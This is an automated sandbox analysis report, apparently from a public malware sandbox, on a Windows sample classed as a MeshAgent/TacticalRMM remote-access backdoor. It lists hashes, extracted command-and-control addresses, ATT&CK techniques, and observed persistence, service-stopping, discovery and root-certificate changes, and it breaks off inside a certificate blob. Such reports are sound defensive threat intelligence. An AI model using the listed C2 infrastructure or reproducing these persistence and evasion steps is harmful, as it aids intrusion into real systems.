meshagent | 16c3ce54c980ffb165d60fb3e4b35e4d5f0c8b8624715f07d11cf460d58e4eb6

Analysis

max time kernel
139s
max time network
141s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
23/01/2025, 17:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-01-23_9f36830d3f867d37d3edd55800ef1677_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe
Size

5.0MB
MD5

9f36830d3f867d37d3edd55800ef1677
SHA1

1d7a79e3a08ce71954416c2cd09ae3c01af082d0
SHA256

16c3ce54c980ffb165d60fb3e4b35e4d5f0c8b8624715f07d11cf460d58e4eb6
SHA512

ee9978bbcf20e6c873a692a1c2d9d2ecf8e95c044c60731d9f4805692718091fd0b84cf88dda436fd9b9e7eab25c1f6c54ec72894cc4840d1744554006e917a8
SSDEEP

49152:cRg0nHQi1uuVvrb/T8vO90d7HjmAFd4A64nsfJWl6OEch34Vx9n5ov0IrQszVS5n:Xi1uuVQEpf5qusz8GEn+eAI

Score

10^/10

meshagent tacticalrmm backdoor defense_evasion discovery execution persistence rat trojan

Malware Config

Extracted

Family

meshagent

Version

Botnet

TacticalRMM

http://mesh.anyhourgroup.com:443/agent.ashx

Attributes

mesh_id
0x3131CC9705ECDCAD5F1EE47ACE7CAD84F8394DBDFFAEB8E3F5C6440C0CB3FFB2E414D885804144F409EB30B05825A7AE
server_id
C8502FFE2B2CAFF1B88B2A8F6433FD9A17EBF79022C9F02F7132AFDADABDA021D5B8CD8BD7C80BA24141837BBB70734E
wss
wss://mesh.anyhourgroup.com:443/agent.ashx

Signatures

Detects MeshAgent payload 1 IoCs

resource	yara_rule
behavioral1/files/0x000a000000015ce8-35.dat	family_meshagent

MeshAgent
MeshAgent is an open source remote access trojan written in C++.
rat trojan backdoor meshagent
Meshagent family
meshagent

Blocklisted process makes network request 4 IoCs

flow	pid	Process
40	2304	powershell.exe
41	2304	powershell.exe
42	2304	powershell.exe
45	2304	powershell.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" "	meshagent.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 12 IoCs

pid	Process
2468	tacticalagent-v2.8.0-windows-amd64.exe
2628	tacticalagent-v2.8.0-windows-amd64.tmp
1760	tacticalrmm.exe
1512	tacticalrmm.exe
2888	meshagent.exe
476	Process not Found
2224	MeshAgent.exe
2908	MeshAgent.exe
2468	tacticalrmm.exe
1212	Process not Found
2284	tacticalrmm.exe
1800	MeshAgent.exe

Loads dropped DLL 4 IoCs

pid	Process
2468	tacticalagent-v2.8.0-windows-amd64.exe
1360	cmd.exe
1512	tacticalrmm.exe
1212	Process not Found

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC	tacticalrmm.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015	tacticalrmm.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015	tacticalrmm.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357	tacticalrmm.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357	tacticalrmm.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC	tacticalrmm.exe

Drops file in Program Files directory 20 IoCs

description	ioc	Process
File created	C:\Program Files\TacticalAgent\unins000.dat	tacticalagent-v2.8.0-windows-amd64.tmp
File created	C:\Program Files\TacticalAgent\is-MJC0H.tmp	tacticalagent-v2.8.0-windows-amd64.tmp
File opened for modification	C:\Program Files\TacticalAgent\unins000.dat	tacticalagent-v2.8.0-windows-amd64.tmp
File created	C:\Program Files\Mesh Agent\MeshAgent.exe	meshagent.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File opened for modification	C:\Program Files\TacticalAgent\agent.log	tacticalrmm.exe
File opened for modification	C:\Program Files\TacticalAgent\agent.log	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\is-R5V67.tmp	tacticalagent-v2.8.0-windows-amd64.tmp
File opened for modification	C:\Program Files\TacticalAgent\agent.log	tacticalrmm.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files\Mesh Agent\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Program Files\TacticalAgent\meshagent.exe	tacticalrmm.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File opened for modification	C:\Program Files\Mesh Agent\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Program Files\Mesh Agent\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Program Files\TacticalAgent\agent.log	tacticalrmm.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.msh	MeshAgent.exe
File opened for modification	C:\Program Files\Mesh Agent\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WindowsUpdate.log	tacticalrmm.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
568	sc.exe
1800	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2304	powershell.exe
1600	powershell.exe
2688	powershell.exe
2824	powershell.exe
3000	powershell.exe
2984	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tacticalagent-v2.8.0-windows-amd64.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tacticalagent-v2.8.0-windows-amd64.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2820	PING.EXE
2672	cmd.exe
2744	PING.EXE
2648	cmd.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
2992	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-162 = "Central Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-71 = "Newfoundland Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-891 = "Morocco Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-382 = "South Africa Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-302 = "Romance Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-392 = "Arab Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	tacticalrmm.exe

Modifies system certificate store 2 TTPs 10 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e309000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 04000000010000001000000091de0625abdafd32170cbb25172a84670f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee419000000010000001000000063664b080559a094d10f0a3c5f4f629020000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f2989046842